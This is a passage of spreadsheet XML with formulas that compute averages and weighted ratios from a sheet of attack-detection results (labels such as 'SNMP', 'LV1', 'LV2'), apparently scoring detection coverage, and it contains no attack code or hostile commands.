      <c r="EJ29" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ21&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ21*'(B) - Detecciones - Ataques'!HN21/('(B) - Detecciones - Ataques'!HN21+'(B) - Detecciones - Ataques'!HO21),0)</f>
        <v>1</v>
      </c>
      <c r="EK29" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ21&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ21*'(B) - Detecciones - Ataques'!HO21/('(B) - Detecciones - Ataques'!HN21+'(B) - Detecciones - Ataques'!HO21),0)</f>
        <v>0</v>
      </c>
      <c r="EM29" s="571"/>
      <c r="EW29" s="379" t="s">
        <v>209</v>
      </c>
      <c r="EX29" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW29)+SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW29 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW29)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW29 &amp; "*"))</f>
        <v>0.7179487179</v>
      </c>
      <c r="EY29" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW29)+SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW29 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW29)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW29 &amp; "*"))</f>
        <v>0.8461538462</v>
      </c>
      <c r="EZ29" s="621"/>
      <c r="FE29" s="173"/>
      <c r="FF29" s="173"/>
      <c r="FG29" s="173"/>
      <c r="FH29" s="173"/>
      <c r="FN29" s="36" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"SNMP")</f>
        <v>SNMP</v>
      </c>
      <c r="FO29" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN29)</f>
        <v>1</v>
      </c>
      <c r="FP29" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN29)</f>
        <v>1</v>
      </c>
      <c r="FQ29" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN29)</f>
        <v>1</v>
      </c>
      <c r="FR29" s="173">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN29)</f>
        <v>1</v>
      </c>
    </row>
    <row r="30">
      <c r="D30" s="20"/>
      <c r="E30" s="20"/>
      <c r="EJ30" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ22&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ22*'(B) - Detecciones - Ataques'!HN22/('(B) - Detecciones - Ataques'!HN22+'(B) - Detecciones - Ataques'!HO22),0)</f>
        <v>0.0001555159214</v>
      </c>
      <c r="EK30" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ22&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ22*'(B) - Detecciones - Ataques'!HO22/('(B) - Detecciones - Ataques'!HN22+'(B) - Detecciones - Ataques'!HO22),0)</f>
        <v>0.0000424134331</v>
      </c>
      <c r="EM30" s="571"/>
      <c r="EW30" s="379" t="s">
        <v>664</v>
      </c>
      <c r="EX30" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW30)+SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW30 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW30)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW30 &amp; "*"))</f>
        <v>0.6761363636</v>
      </c>
      <c r="EY30" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW30)+SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW30 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW30)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW30 &amp; "*"))</f>
        <v>0.75</v>
      </c>
      <c r="EZ30" s="621"/>
      <c r="FE30" s="173"/>
      <c r="FF30" s="173"/>
      <c r="FG30" s="173"/>
      <c r="FH30" s="173"/>
      <c r="FN30" s="36"/>
      <c r="FO30" s="336"/>
      <c r="FP30" s="336"/>
      <c r="FQ30" s="336"/>
      <c r="FR30" s="173"/>
    </row>
    <row r="31">
      <c r="D31" s="561"/>
      <c r="E31" s="20"/>
      <c r="EJ31" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ23&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ23*'(B) - Detecciones - Ataques'!HN23/('(B) - Detecciones - Ataques'!HN23+'(B) - Detecciones - Ataques'!HO23),0)</f>
        <v>0</v>
      </c>
      <c r="EK31" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ23&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ23*'(B) - Detecciones - Ataques'!HO23/('(B) - Detecciones - Ataques'!HN23+'(B) - Detecciones - Ataques'!HO23),0)</f>
        <v>0</v>
      </c>
      <c r="EM31" s="571"/>
      <c r="EW31" s="379" t="s">
        <v>357</v>
      </c>
      <c r="EX31" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW31)+SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW31 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW31)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW31 &amp; "*"))</f>
        <v>0.7</v>
      </c>
      <c r="EY31" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW31)+SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW31 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW31)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW31 &amp; "*"))</f>
        <v>0.8</v>
      </c>
      <c r="EZ31" s="621"/>
      <c r="FE31" s="173"/>
      <c r="FF31" s="173"/>
      <c r="FG31" s="173"/>
      <c r="FH31" s="173"/>
      <c r="FL31" s="36"/>
    </row>
    <row r="32">
      <c r="EJ32" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ24&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ24*'(B) - Detecciones - Ataques'!HN24/('(B) - Detecciones - Ataques'!HN24+'(B) - Detecciones - Ataques'!HO24),0)</f>
        <v>0</v>
      </c>
      <c r="EK32" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ24&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ24*'(B) - Detecciones - Ataques'!HO24/('(B) - Detecciones - Ataques'!HN24+'(B) - Detecciones - Ataques'!HO24),0)</f>
        <v>0</v>
      </c>
      <c r="EM32" s="571"/>
      <c r="EW32" s="379" t="s">
        <v>310</v>
      </c>
      <c r="EX32" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW32)+SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW32 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW32)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW32 &amp; "*"))</f>
        <v>0.3012371907</v>
      </c>
      <c r="EY32" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW32)+SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW32 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW32)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW32 &amp; "*"))</f>
        <v>0.8</v>
      </c>
      <c r="EZ32" s="621"/>
    </row>
    <row r="33">
      <c r="EJ33" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ25&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ25*'(B) - Detecciones - Ataques'!HN25/('(B) - Detecciones - Ataques'!HN25+'(B) - Detecciones - Ataques'!HO25),0)</f>
        <v>0</v>
      </c>
      <c r="EK33" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ25&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ25*'(B) - Detecciones - Ataques'!HO25/('(B) - Detecciones - Ataques'!HN25+'(B) - Detecciones - Ataques'!HO25),0)</f>
        <v>0</v>
      </c>
      <c r="EM33" s="571"/>
      <c r="EW33" s="379" t="s">
        <v>292</v>
      </c>
      <c r="EX33" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW33)+SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW33 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW33)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW33 &amp; "*"))</f>
        <v>0.6</v>
      </c>
      <c r="EY33" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW33)+SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW33 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW33)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW33 &amp; "*"))</f>
        <v>0.6</v>
      </c>
      <c r="EZ33" s="621"/>
    </row>
    <row r="34">
      <c r="EJ34" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ26&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ26*'(B) - Detecciones - Ataques'!HN26/('(B) - Detecciones - Ataques'!HN26+'(B) - Detecciones - Ataques'!HO26),0)</f>
        <v>0</v>
      </c>
      <c r="EK34" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ26&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ26*'(B) - Detecciones - Ataques'!HO26/('(B) - Detecciones - Ataques'!HN26+'(B) - Detecciones - Ataques'!HO26),0)</f>
        <v>0</v>
      </c>
      <c r="EM34" s="571"/>
      <c r="EW34" s="422" t="s">
        <v>558</v>
      </c>
      <c r="EX34" s="691">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW34)+SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW34 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW34)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW34 &amp; "*"))</f>
        <v>0.4431818182</v>
      </c>
      <c r="EY34" s="692">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW34)+SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW34 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW34)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW34 &amp; "*"))</f>
        <v>0.75</v>
      </c>
      <c r="EZ34" s="621"/>
    </row>
    <row r="35">
      <c r="EJ35" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ27&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ27*'(B) - Detecciones - Ataques'!HN27/('(B) - Detecciones - Ataques'!HN27+'(B) - Detecciones - Ataques'!HO27),0)</f>
        <v>0</v>
      </c>
      <c r="EK35" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ27&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ27*'(B) - Detecciones - Ataques'!HO27/('(B) - Detecciones - Ataques'!HN27+'(B) - Detecciones - Ataques'!HO27),0)</f>
        <v>1</v>
      </c>
      <c r="EM35" s="571"/>
    </row>
    <row r="36">
      <c r="C36" s="42" t="s">
        <v>2682</v>
      </c>
      <c r="D36" s="69">
        <f>E26</f>
        <v>0.5378890268</v>
      </c>
      <c r="EJ36" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ28&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ28*'(B) - Detecciones - Ataques'!HN28/('(B) - Detecciones - Ataques'!HN28+'(B) - Detecciones - Ataques'!HO28),0)</f>
        <v>1</v>
      </c>
      <c r="EK36" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ28&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ28*'(B) - Detecciones - Ataques'!HO28/('(B) - Detecciones - Ataques'!HN28+'(B) - Detecciones - Ataques'!HO28),0)</f>
        <v>0</v>
      </c>
      <c r="EM36" s="571"/>
    </row>
    <row r="37">
      <c r="C37" s="42" t="s">
        <v>2683</v>
      </c>
      <c r="D37" s="338">
        <f>1-D36</f>
        <v>0.4621109732</v>
      </c>
      <c r="EJ37" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ29&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ29*'(B) - Detecciones - Ataques'!HN29/('(B) - Detecciones - Ataques'!HN29+'(B) - Detecciones - Ataques'!HO29),0)</f>
        <v>0</v>
      </c>
      <c r="EK37" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ29&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ29*'(B) - Detecciones - Ataques'!HO29/('(B) - Detecciones - Ataques'!HN29+'(B) - Detecciones - Ataques'!HO29),0)</f>
        <v>0</v>
      </c>
      <c r="EM37" s="571"/>
      <c r="EW37" s="330" t="s">
        <v>2448</v>
      </c>
      <c r="EX37" s="12" t="s">
        <v>2684</v>
      </c>
      <c r="EY37" s="451" t="s">
        <v>2685</v>
      </c>
      <c r="EZ37" s="12" t="s">
        <v>2686</v>
      </c>
      <c r="FA37" s="451" t="s">
        <v>2687</v>
      </c>
    </row>
    <row r="38">
      <c r="EJ38" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ30&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ30*'(B) - Detecciones - Ataques'!HN30/('(B) - Detecciones - Ataques'!HN30+'(B) - Detecciones - Ataques'!HO30),0)</f>
        <v>0</v>
      </c>
      <c r="EK38" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ30&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ30*'(B) - Detecciones - Ataques'!HO30/('(B) - Detecciones - Ataques'!HN30+'(B) - Detecciones - Ataques'!HO30),0)</f>
        <v>0</v>
      </c>
      <c r="EM38" s="571"/>
      <c r="EW38" s="379" t="s">
        <v>2093</v>
      </c>
      <c r="EX38" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW38)+SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW38 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW38)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW38 &amp; "*"))</f>
        <v>0.1854618168</v>
      </c>
      <c r="EY38" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW38)+SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW38 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW38)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW38 &amp; "*"))</f>
        <v>0.6666666667</v>
      </c>
      <c r="EZ38" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW38,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW38 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW38,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW38 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0.2225541801</v>
      </c>
      <c r="FA38" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW38,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW38 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW38,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW38 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>0</v>
      </c>
    </row>
    <row r="39">
      <c r="EJ39" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ31&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ31*'(B) - Detecciones - Ataques'!HN31/('(B) - Detecciones - Ataques'!HN31+'(B) - Detecciones - Ataques'!HO31),0)</f>
        <v>0</v>
      </c>
      <c r="EK39" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ31&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ31*'(B) - Detecciones - Ataques'!HO31/('(B) - Detecciones - Ataques'!HN31+'(B) - Detecciones - Ataques'!HO31),0)</f>
        <v>0</v>
      </c>
      <c r="EM39" s="571"/>
      <c r="EW39" s="379" t="s">
        <v>2013</v>
      </c>
      <c r="EX39" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW39)+SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW39 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW39)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW39 &amp; "*"))</f>
        <v>0.05366134369</v>
      </c>
      <c r="EY39" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW39)+SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW39 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW39)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW39 &amp; "*"))</f>
        <v>1</v>
      </c>
      <c r="EZ39" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW39,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW39 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW39,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW39 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0.05366134369</v>
      </c>
      <c r="FA39" s="635" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="40">
      <c r="EJ40" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ32&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ32*'(B) - Detecciones - Ataques'!HN32/('(B) - Detecciones - Ataques'!HN32+'(B) - Detecciones - Ataques'!HO32),0)</f>
        <v>0</v>
      </c>
      <c r="EK40" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ32&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ32*'(B) - Detecciones - Ataques'!HO32/('(B) - Detecciones - Ataques'!HN32+'(B) - Detecciones - Ataques'!HO32),0)</f>
        <v>1</v>
      </c>
      <c r="EM40" s="571"/>
      <c r="EW40" s="379" t="s">
        <v>951</v>
      </c>
      <c r="EX40" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW40)+SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW40 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW40)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW40 &amp; "*"))</f>
        <v>0.9</v>
      </c>
      <c r="EY40" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW40)+SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW40 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW40)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW40 &amp; "*"))</f>
        <v>0.9</v>
      </c>
